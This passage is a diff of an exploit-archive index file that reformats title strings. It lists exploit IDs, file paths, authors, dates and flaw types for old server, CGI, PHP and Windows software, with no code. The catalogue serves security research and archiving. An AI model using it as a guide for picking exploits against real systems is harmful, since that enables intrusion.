Vulnerability",2000-12-07,Dodger,windows,remote,0 20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal Vulnerability",2000-12-07,"SNS Research",windows,remote,0 20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 DNS Buffer Overflow Vulnerability",2000-12-04,nimrood,unix,remote,0 -20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 Arbitrary Proxy Usage Vulnerability",2000-12-08,"Jouko Pynnonen",multiple,remote,0 +20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage Vulnerability",2000-12-08,"Jouko Pynnonen",multiple,remote,0 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String Vulnerability",2000-12-11,c0ncept,unix,remote,0 20493,platforms/linux/local/20493.sh,"University of Washington Pico 3.x/4.x File Overwrite Vulnerability",2000-12-11,mat,linux,local,0 20494,platforms/linux/remote/20494.pl,"RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability",2000-12-11,dethy,linux,remote,0 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 -20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 +20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload Vulnerability",2012-08-15,metasploit,php,remote,0 20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,metasploit,windows,remote,7879 20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management Remote Execution",2012-08-15,metasploit,java,remote,8080 @@ -17813,7 +17813,7 @@ id,file,description,date,author,platform,type,port 20523,platforms/cgi/remote/20523.pl,"Technote 2000/2001 - 'filename' Parameter Command Execution And File Disclosure Vulnerability",2000-12-27,Ksecurity,cgi,remote,0 20524,platforms/cgi/remote/20524.txt,"Brian Stanback bsguest.cgi 1.0 - Remote Command Execution Vulnerability",2000-12-20,rivendell_team,cgi,remote,0 20525,platforms/cgi/remote/20525.txt,"Brian Stanback bslist.cgi 1.0 - Remote Command Execution Vulnerability",2000-12-20,rivendell_team,cgi,remote,0 -20526,platforms/unix/local/20526.c,"GTK+ 1.2.8 Arbitrary Loadable Module Execution Vulnerability",2001-01-02,V9,unix,local,0 +20526,platforms/unix/local/20526.c,"GTK+ 1.2.8 - Arbitrary Loadable Module Execution Vulnerability",2001-01-02,V9,unix,local,0 20527,platforms/cgi/remote/20527.txt,"Informix Webdriver 1.0 - Remote Administration Access Vulnerability",2000-12-30,isno,cgi,remote,0 20528,platforms/windows/remote/20528.html,"Microsoft Windows Media Player 7.0 Javascript URL Vulnerability",2001-01-01,"Georgi Guninski",windows,remote,0 20529,platforms/multiple/remote/20529.pl,"Lotus Domino Server 5.0.x - Directory Traversal Vulnerability (1)",2001-01-15,"Michael Smith",multiple,remote,0 @@ -17866,12 +17866,12 @@ id,file,description,date,author,platform,type,port 20580,platforms/php/webapps/20580.txt,"webid <= 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow Vulnerability",2001-01-18,"Luis Miguel Silva",linux,local,0 20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 print_client() Format String Vulnerability",2001-01-21,CyRaX,windows,remote,0 -20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 Arbitrary Command Execution Vulnerability",1998-06-24,"Doru Petrescu",cgi,remote,0 +20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 - Arbitrary Command Execution Vulnerability",1998-06-24,"Doru Petrescu",cgi,remote,0 20584,platforms/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal Vulnerability",2001-01-22,"SNS Research",windows,remote,0 20585,platforms/windows/local/20585.txt,"localweb2000 1.1 - Directory Traversal Vulnerability",2001-01-22,"SNS Research",windows,local,0 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 admin.php3 Unverified Administrative Password Change Vulnerability",2000-01-06,"Max Vision",php,webapps,0 -20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 Arbitrary Email Relay Vulnerability",2000-01-01,"Max Vision",php,webapps,0 -20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 +20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 - Arbitrary Email Relay Vulnerability",2000-01-01,"Max Vision",php,webapps,0 +20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 20589,platforms/windows/local/20589.c,"eEye Digital Security IRIS 1.0.1 GET Denial of Service Vulnerability",2001-01-21,grazer,windows,local,0 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure Vulnerability",2001-01-24,"Security Research Team",multiple,remote,0 @@ -17904,7 +17904,7 @@ id,file,description,date,author,platform,type,port 20618,platforms/multiple/remote/20618.txt,"IBM Net.Commerce 2.0/3.x/4.x orderdspc.d2w order_rn Option SQL Injection",2001-02-05,"Rudi Carell",multiple,remote,0 20619,platforms/linux/remote/20619.c,"Linuxconf 1.1.6 r10 - Remote Buffer Overflow Vulnerablity",1999-12-21,R00T-X,linux,remote,0 20620,platforms/sco/remote/20620.c,"SCO UNIX 5 calserver Remote Buffer Overflow Vulnerability",1998-12-29,"Leshka Zakharoff",sco,remote,0 -20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 Arbitrary Command Execution Vulnerability",2001-02-12,"Dixie Flatline",unix,local,0 +20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution Vulnerability",2001-02-12,"Dixie Flatline",unix,local,0 20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands Vulnerability",2001-02-01,isno,linux,remote,0 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal Vulnerability",2001-02-12,slipy,cgi,remote,0 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,metasploit,windows,remote,0 @@ -17922,7 +17922,7 @@ id,file,description,date,author,platform,type,port 20636,platforms/linux/remote/20636.txt,"thinking arts es.one 1.0 - Directory Traversal Vulnerability",2001-02-16,slipy,linux,remote,0 20637,platforms/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal Vulnerability",2001-02-16,slipy,windows,remote,0 20638,platforms/multiple/remote/20638.txt,"Bajie Webserver 0.78/0.90 - Remote Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 -20639,platforms/multiple/remote/20639.txt,"Bajie 0.78 Arbitrary Shell Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 +20639,platforms/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution Vulnerability",2001-02-15,joetesta,multiple,remote,0 20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 Path Disclosure Vulnerability",2001-02-20,"SNS Research",windows,remote,0 20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 DoS Vulnerability",2001-02-20,"SNS Research",windows,dos,0 20642,platforms/cgi/remote/20642.pl,"Adcycle 0.77/0.78 AdLibrary.pm Session Access Vulnerability",2001-02-19,"Neil K",cgi,remote,0 @@ -17983,13 +17983,13 @@ id,file,description,date,author,platform,type,port 20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 20705,platforms/multiple/dos/20705.py,"sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 -20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)",2012-08-21,Kc57,linux,webapps,0 -20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 +20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change (MSF)",2012-08-21,Kc57,linux,webapps,0 +20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0 20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 -20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 +20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0 20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal Vulnerability",2001-03-28,lovehacker,windows,remote,0 @@ -18020,7 +18020,7 @@ id,file,description,date,author,platform,type,port 20741,platforms/solaris/local/20741.c,"Solaris 7/8 kcms_configure Command-Line Buffer Overflow Vulnerability (2)",2001-04-09,"Adam Slattery",solaris,local,0 20742,platforms/sco/dos/20742.txt,"SCO Open Server 5.0.6 recon Buffer Overflow Vulnerability",2001-03-27,"Secure Network Operations",sco,dos,0 20743,platforms/solaris/local/20743.c,"Solaris 2.x/7.0/8 Xsun HOME Buffer Overflow Vulnerability",2001-04-10,"Riley Hassell",solaris,local,0 -20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 Arbitrary Code Execution Vulnerability",2001-04-10,Kanedaaa,cgi,remote,0 +20744,platforms/cgi/remote/20744.pl,"nph-maillist 3.0/3.5 - Arbitrary Code Execution Vulnerability",2001-04-10,Kanedaaa,cgi,remote,0 20745,platforms/solaris/remote/20745.txt,"Solaris 2.6/7.0 IN.FTPD CWD Username Enumeration Vulnerability",2001-04-11,"Johnny Cyberpunk",solaris,remote,0 20746,platforms/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 Limited Password-Space Vulnerability",2001-04-10,"Thomas Roessler",palm_os,local,0 20747,platforms/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",linux,dos,0 @@ -18155,7 +18155,7 @@ id,file,description,date,author,platform,type,port 20884,platforms/windows/remote/20884.txt,"ACLogic CesarFTP 0.98b - Directory Traversal Vulnerability",2001-05-27,byterage,windows,remote,0 20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool Buffer Overflow Vulnerability",2001-06-01,51,solaris,local,0 20886,platforms/windows/remote/20886.txt,"Omnicron OmniHTTPD 2.0.4-8 File Source Disclosure Vulnerability",2001-05-26,astral,windows,remote,0 -20887,platforms/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 Arbitrary File Disclosure Vulnerability",2001-05-28,Marshal,cgi,remote,0 +20887,platforms/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 - Arbitrary File Disclosure Vulnerability",2001-05-28,Marshal,cgi,remote,0 20888,platforms/windows/remote/20888.txt,"Qualcomm Eudora 5.1 Hidden Attachment Execution Vulnerability",2001-05-29,http-equiv,windows,remote,0 20889,platforms/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x Format String Vulnerability",2001-05-29,"fish stiqz",multiple,remote,0 20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 HTML tag Script-filtering Bypass Vulnerability",2001-05-29,"eDvice Security Services",multiple,remote,0 @@ -18170,7 +18170,7 @@ id,file,description,date,author,platform,type,port 20899,platforms/windows/remote/20899.txt,"Microsoft Outlook 97/98/2000/4/5 Address Book Spoofing Vulnerability",2001-06-05,3APA3A,windows,remote,0 20900,platforms/linux/local/20900.txt,"Exim 3.x Format String Vulnerability",2001-06-06,"Megyer Laszlo",linux,local,0 20901,platforms/linux/local/20901.c,"Sudo 1.5/1.6 Heap Corruption Vulnerability",2001-02-22,MaXX,linux,local,0 -20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0 +20902,platforms/linux/remote/20902.c,"PKCrew TIAtunnel 0.9 alpha2 - Authentication Mechanism Buffer Overflow Vulnerability",2001-06-05,qitest1,linux,remote,0 20903,platforms/windows/remote/20903.html,"Microsoft Internet Explorer 5.5 File Disclosure Vulnerability",2001-03-31,"Georgi Guninski",windows,remote,0 20904,platforms/windows/remote/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,remote,0 20905,platforms/unix/local/20905.txt,"Thibault Godouet FCron 1 Symbolic Link Vulnerability",2001-06-07,"Uwe Ohse",unix,local,0 @@ -18184,7 +18184,7 @@ id,file,description,date,author,platform,type,port 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection Vulnerability",2012-08-29,Spy_w4r3,php,webapps,0 20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20915,platforms/windows/local/20915.py,"ActFax 4.31 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 -20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 +20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0 20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow DoS Vulnerability",2001-06-12,"Jass Seljamaa",osx,dos,0 @@ -18211,7 +18211,7 @@ id,file,description,date,author,platform,type,port 20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,metasploit,windows,remote,0 20945,platforms/solaris/local/20945.txt,"Sun SunVTS 4.x PTExec Buffer Overflow Vulnerability",2001-06-21,"Pablo Sor",solaris,local,0 20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow DoS Vulnerability",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 -20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 Arbitrary File Disclosure Vulnerability",2001-06-21,ViperSV,windows,remote,0 +20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure Vulnerability",2001-06-21,ViperSV,windows,remote,0 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability",2001-06-21,"NERF Security",windows,dos,0 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0 @@ -18245,7 +18245,7 @@ id,file,description,date,author,platform,type,port 20979,platforms/linux/local/20979.c,"Linux kernel 2.2/2.4 procfs Stream Redirection to Process Memory Vulnerability",2001-06-27,zen-parse,linux,local,0 20980,platforms/windows/remote/20980.c,"Oracle 8i TNS Listener Buffer Overflow Vulnerability",2001-07-20,benjurry,windows,remote,0 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 -20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 Arbitrary Code Execution Vulnerability",2001-06-28,"Igor Dobrovitski",cgi,remote,0 +20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution Vulnerability",2001-06-28,"Igor Dobrovitski",cgi,remote,0 20983,platforms/php/webapps/20983.pl,"Joomla Spider Calendar Lite (com_spidercalendar) SQL Injection",2012-09-01,D4NB4R,php,webapps,0 20984,platforms/osx/remote/20984.txt,"Apple Mac OS X 10 nidump Password File Disclosure Vulnerability",2001-06-26,"Steven Kreuzer",osx,remote,0 20985,platforms/php/local/20985.php,"PHP 4.x SafeMode Arbitrary File Execution Vulnerability",2001-06-30,"Wojciech Purczynski",php,local,0 @@ -18267,7 +18267,7 @@ id,file,description,date,author,platform,type,port 21001,platforms/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (3)",2001-07-10,ml85p,hardware,local,0 21002,platforms/multiple/remote/21002.txt,"Apache 1.3 Possible Directory Index Disclosure Vulnerability",2001-07-10,Kevin,multiple,remote,0 21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 -21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 +21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 @@ -18313,7 +18313,7 @@ id,file,description,date,author,platform,type,port 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow Vulnerability (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow Vulnerability (2)",1995-02-17,Xtremist,linux,remote,0 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3, greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 -21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 +21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection Vulnerability",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 Internal IP Address/Internal Network Name Disclosure Vulnerability",2001-08-08,"Marek Roy",windows,remote,0 @@ -18338,7 +18338,7 @@ id,file,description,date,author,platform,type,port 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption Vulnerability",2001-08-20,MacSec,osx,local,0 21077,platforms/bsd/local/21077.c,"BSDI 3.0/3.1 Possible Local Kernel Denial of Service Vulnerability",2001-08-21,V9,bsd,local,0 21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 Weak Password Encryption Vulnerability",2001-08-23,"Desmond Irvine",multiple,local,0 -21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 Arbitrary File Creation Vulnerability",2012-09-05,metasploit,php,webapps,0 +21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 - Arbitrary File Creation Vulnerability",2012-09-05,metasploit,php,webapps,0 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,metasploit,multiple,remote,0 21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 @@ -18360,7 +18360,7 @@ id,file,description,date,author,platform,type,port 21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 rlmadmin Symbolic Link Vulnerability",2001-09-07,"Digital Shadow",unix,local,0 21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 beta - Directory Traversal Arbitrary File Disclosure Vulnerability",2001-09-07,"Steve Shepherd",cgi,remote,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 IP Fragment Denial of Service Vulnerability",2000-05-23,phonix,hardware,dos,0 -21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability",2001-09-08,"Alexey Sintsov",cgi,remote,0 +21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution Vulnerability",2001-09-08,"Alexey Sintsov",cgi,remote,0 21105,platforms/unix/local/21105.c,"Digital Unix 4.0 MSGCHK Buffer Overflow Vulnerability",2001-09-05,seo,unix,local,0 21106,platforms/unix/local/21106.txt,"Taylor UUCP 1.0.6 Argument Handling Privilege Elevation Vulnerability",2001-09-08,zen-parse,unix,local,0 21107,platforms/unix/local/21107.sh,"Digital Unix 4.0 MSGCHK MH_PROFILE Symbolic Link Vulnerability",2001-09-10,seo,unix,local,0 @@ -18563,7 +18563,7 @@ id,file,description,date,author,platform,type,port 21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 User Status Remote Information Disclosure Vulnerability",2002-02-27,spybreak,linux,remote,0 21311,platforms/windows/remote/21311.txt,"BPM Studio Pro 4.2 HTTPD Directory Traversal Vulnerability",2002-02-27,UNTER,windows,remote,0 21312,platforms/php/webapps/21312.txt,"ReBB 1.0 Image Tag Cross-Agent Scripting Vulnerability",2002-03-04,skizzik,php,webapps,0 -21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 Authentication Method Disclosure Vulnerability",2002-03-05,"David Litchfield",windows,remote,0 +21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure Vulnerability",2002-03-05,"David Litchfield",windows,remote,0 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability",2002-03-07,Morgan,unix,remote,0 21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 @@ -18628,9 +18628,9 @@ id,file,description,date,author,platform,type,port 21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 User-Embedded Scripting Vulnerability",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation Vulnerability",2002-04-14,Firehack,php,webapps,0 21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 Form Field Input Validation Vulnerability",2002-04-14,Firehack,php,webapps,0 -21384,platforms/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 Authentication Check SQL Injection Vulnerability",2002-04-15,"pokleyzz sakamaniaka",multiple,remote,0 +21384,platforms/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection Vulnerability",2002-04-15,"pokleyzz sakamaniaka",multiple,remote,0 21385,platforms/windows/remote/21385.txt,"Microsoft IIS 5.0 CodeBrws.ASP Source Code Disclosure Vulnerability",2002-04-16,"H D Moore",windows,remote,0 -21386,platforms/windows/remote/21386.html,"AOL Instant Messenger 4.x Arbitrary File Creation Vulnerability",2002-04-17,"Noah Johnson",windows,remote,0 +21386,platforms/windows/remote/21386.html,"AOL Instant Messenger 4.x - Arbitrary File Creation Vulnerability",2002-04-17,"Noah Johnson",windows,remote,0 21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0 21388,platforms/windows/dos/21388.c,"Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2)",2003-01-03,ch0wn,windows,dos,0 @@ -18669,10 +18669,10 @@ id,file,description,date,author,platform,type,port 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting Vulnerability",2002-04-25,frog,linux,remote,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection Vulnerability",2002-04-25,frog,php,webapps,0 21424,platforms/php/webapps/21424.txt,"Admanager 1.1 Content Manipulation Vulnerability",2002-04-17,frog,php,webapps,0 -21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 +21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 Direct Script Call Authentication Bypass Vulnerability",2002-04-28,ppp-design,php,webapps,0 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting Vulnerability",2002-04-17,frog,php,webapps,0 -21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0 +21428,platforms/php/webapps/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS Vulnerability",2002-04-27,frog,php,webapps,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow Vulnerability (1)",2002-04-15,"MaD SKiLL",windows,dos,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x Performance Co-Pilot Remote Denial of Service Vulnerability",2002-04-12,"Marcelo Magnasco",irix,dos,0 21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character DoS",2002-04-30,"Peter Gründl",windows,dos,0 @@ -18681,7 +18681,7 @@ id,file,description,date,author,platform,type,port 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher Cross-Site Scripting Vulnerability",2002-05-05,frog,cgi,webapps,0 21436,platforms/php/webapps/21436.txt,"B2 0.6 b2edit.showposts.php b2inc Parameter Remote File Inclusion",2002-05-06,Frank,php,webapps,0 21437,platforms/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd Heap Overflow Vulnerability",2002-01-01,"Last Stage of Delirium",solaris,remote,0 -21438,platforms/windows/remote/21438.txt,"WorldClient 5.0.x Arbitrary File Deletion Vulnerability",2002-05-07,Obscure,windows,remote,0 +21438,platforms/windows/remote/21438.txt,"WorldClient 5.0.x - Arbitrary File Deletion Vulnerability",2002-05-07,Obscure,windows,remote,0 21439,platforms/windows/remote/21439.txt,"MDaemon WorldClient 5.0.x Folder Creation Buffer Overflow Vulnerability",2002-05-07,Obscure,windows,remote,0 21440,platforms/bsd/remote/21440.c,"ISC DHCPD 2.0/3.0.1 NSUPDATE Remote Format String Vulnerability",2002-05-08,Andi,bsd,remote,0 21441,platforms/hardware/remote/21441.txt,"Cisco ATA-186 HTTP Device Configuration Disclosure Vulnerability",2002-05-09,"Patrick Michael Kane",hardware,remote,0 @@ -18699,7 +18699,7 @@ id,file,description,date,author,platform,type,port 21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 Content Blocking Script Injection Vulnerability",2002-05-17,"E M",multiple,remote,0 21454,platforms/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Include 